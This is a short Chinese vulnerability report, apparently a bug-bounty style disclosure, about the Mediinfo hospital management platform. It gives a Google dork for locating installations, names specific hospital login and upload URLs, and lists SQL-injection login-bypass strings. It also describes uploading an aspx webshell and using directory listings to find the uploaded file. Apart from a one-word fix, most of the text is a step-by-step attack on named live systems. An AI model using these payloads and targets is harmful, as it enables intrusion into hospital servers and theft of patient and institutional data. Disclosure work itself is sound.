不少医院在用,危害挺大!多数已被大黑产搞,望重视
谷歌搜索:
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3Acms%2FColumn.aspx%3F
联众Mediinfo医院综合管理平台
后台登录处存在sql注入万能密码直接进,然后可以文件上传。看下面吧
http://www.zchospital.com/login.aspx
输入admin’ or ‘1’=’1直接登录
发布文件下面的文件上传可以拿shell
好像不少服务器都被大黑产占领了
其它服务器测试注入:
http://nhdyyy.com/login.aspx 这个需要换个方法,用户名输入admin’ or ‘1’=’1’--
会泄漏不少医院的信息
如果不进入后台的话还有一个方法拿shell,但是比较鸡肋
http://www.fysrmyy.com/xtwh/upfile.aspx
随意选择一个aspx文件,自动上传
由于文件名随机数化了,所以只能配合目录遍历来获取文件名:
http://www.fysrmyy.com/upfile/OA_NR/201402/
都已经成黑产专区了
另外一个例子:
http://nhdyyy.com/xtwh/upfile.aspx
也已经是养马场了都
http://nhdyyy.com/upfile/201402/
修复方案:
过滤,过滤